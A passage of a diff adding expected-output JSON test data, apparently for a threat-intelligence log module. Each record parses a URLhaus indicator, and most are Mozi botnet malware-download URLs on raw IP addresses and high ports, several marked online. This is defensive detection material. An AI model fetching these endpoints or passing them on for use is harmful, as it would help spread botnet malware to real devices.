"threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961532/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 4632, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "27.41.11.238", + "threatintel.indicator.first_seen": "2021-01-14T21:06:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "27.41.11.238", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://27.41.11.238:34478/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 34478, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961533/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 4986, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "182.127.133.68", + "threatintel.indicator.first_seen": "2021-01-14T21:06:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "182.127.133.68", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://182.127.133.68:35703/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 35703, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961534/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 5344, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "27.46.44.102", + "threatintel.indicator.first_seen": "2021-01-14T21:06:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "27.46.44.102", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://27.46.44.102:48666/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 48666, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961535/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 5698, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "39.70.88.65", + "threatintel.indicator.first_seen": "2021-01-14T21:06:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "39.70.88.65", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://39.70.88.65:53923/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 53923, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961536/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 6050, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "42.224.136.237", + "threatintel.indicator.first_seen": "2021-01-14T21:06:05.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "42.224.136.237", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://42.224.136.237:52794/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 52794, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961530/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 6408, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "117.208.135.63", + "threatintel.indicator.first_seen": "2021-01-14T21:05:34.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "117.208.135.63", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://117.208.135.63:49312/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 49312, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961525/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 6768, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "125.47.66.60", + "threatintel.indicator.first_seen": "2021-01-14T21:05:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "125.47.66.60", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://125.47.66.60:38961/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 38961, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961526/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 7122, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "182.117.95.148", + "threatintel.indicator.first_seen": "2021-01-14T21:05:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "182.117.95.148", + "threatintel.indicator.url.extension": "a", + "threatintel.indicator.url.original": "http://182.117.95.148:50420/Mozi.a", + "threatintel.indicator.url.path": "/Mozi.a", + "threatintel.indicator.url.port": 50420, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961527/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 7480, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "117.202.71.48", + "threatintel.indicator.first_seen": "2021-01-14T21:05:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "117.202.71.48", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://117.202.71.48:55007/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 55007, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961528/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 7836, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "125.99.132.118", + "threatintel.indicator.first_seen": "2021-01-14T21:05:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "125.99.132.118", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://125.99.132.118:51143/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 51143, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961529/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 8194, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "182.114.123.69", + "threatintel.indicator.first_seen": "2021-01-14T21:05:06.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "182.114.123.69", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://182.114.123.69:41003/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 41003, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961524/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 8552, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "116.19.127.37", + "threatintel.indicator.first_seen": "2021-01-14T21:04:38.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "116.19.127.37", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://116.19.127.37:35739/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 35739, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961523/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 8903, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "42.239.253.55", + "threatintel.indicator.first_seen": "2021-01-14T21:04:36.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "42.239.253.55", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://42.239.253.55:45653/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 45653, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961520/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 9254, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "103.217.121.228", + "threatintel.indicator.first_seen": "2021-01-14T21:04:33.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "103.217.121.228", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://103.217.121.228:41349/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 41349, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961521/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 9609, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "111.92.81.255", + "threatintel.indicator.first_seen": "2021-01-14T21:04:33.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "111.92.81.255", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://111.92.81.255:48586/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 48586, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961522/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 9960, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "45.229.55.75", + "threatintel.indicator.first_seen": "2021-01-14T21:04:33.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "45.229.55.75", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://45.229.55.75:38111/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 38111, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961518/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 10309, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "182.121.242.148", + "threatintel.indicator.first_seen": "2021-01-14T21:04:10.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "182.121.242.148", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://182.121.242.148:34556/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 34556, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961519/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 10662, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "106.115.189.249", + "threatintel.indicator.first_seen": "2021-01-14T21:04:10.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "106.115.189.249", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://106.115.189.249:59815/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 59815, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961516/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 11022, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "32-bit", + "elf", + "mips" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "182.117.93.110", + "threatintel.indicator.first_seen": "2021-01-14T21:04:08.000Z", + "threatintel.indicator.provider": "geenensp", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "182.117.93.110", + "threatintel.indicator.url.extension": "sh", + "threatintel.indicator.url.original": "http://182.117.93.110:50587/bin.sh", + "threatintel.indicator.url.path": "/bin.sh", + "threatintel.indicator.url.port": 50587, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961517/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 11386, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "elf", + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "110.251.5.169", + "threatintel.indicator.first_seen": "2021-01-14T21:04:08.000Z", + "threatintel.indicator.provider": "lrz_urlhaus", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "110.251.5.169", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://110.251.5.169:48322/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 48322, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961515/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 11742, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "101.51.117.186", + "threatintel.indicator.first_seen": "2021-01-14T21:04:06.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "101.51.117.186", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://101.51.117.186:33317/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 33317, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961513/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 12093, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "121.151.78.166", + "threatintel.indicator.first_seen": "2021-01-14T21:04:05.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "121.151.78.166", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://121.151.78.166:41516/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 41516, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961514/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 12444, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "116.72.92.97", + "threatintel.indicator.first_seen": "2021-01-14T21:04:05.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "116.72.92.97", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://116.72.92.97:57798/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 57798, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961509/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 12791, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "27.218.15.209", + "threatintel.indicator.first_seen": "2021-01-14T21:04:04.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "27.218.15.209", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://27.218.15.209:47671/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 47671, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961510/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 13140, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "Mozi" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "120.85.171.210", + "threatintel.indicator.first_seen": "2021-01-14T21:04:04.000Z", + "threatintel.indicator.provider": "Gandylyan1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "120.85.171.210", + "threatintel.indicator.url.extension": "m", + "threatintel.indicator.url.original": "http://120.85.171.210:57690/Mozi.m", + "threatintel.indicator.url.path": "/Mozi.m", + "threatintel.indicator.url.port": 57690, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961511/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 13491, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": true, + "threatintel.abuseurl.tags": [ + "32-bit", + "elf", + "mips" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "online", + "threatintel.indicator.domain": "117.251.59.53", + "threatintel.indicator.first_seen": "2021-01-14T21:04:04.000Z", + "threatintel.indicator.provider": "geenensp", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "117.251.59.53", + "threatintel.indicator.url.original": "http://117.251.59.53:50611/i", + "threatintel.indicator.url.path": "/i", + "threatintel.indicator.url.port": 50611, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961512/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 13848, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not 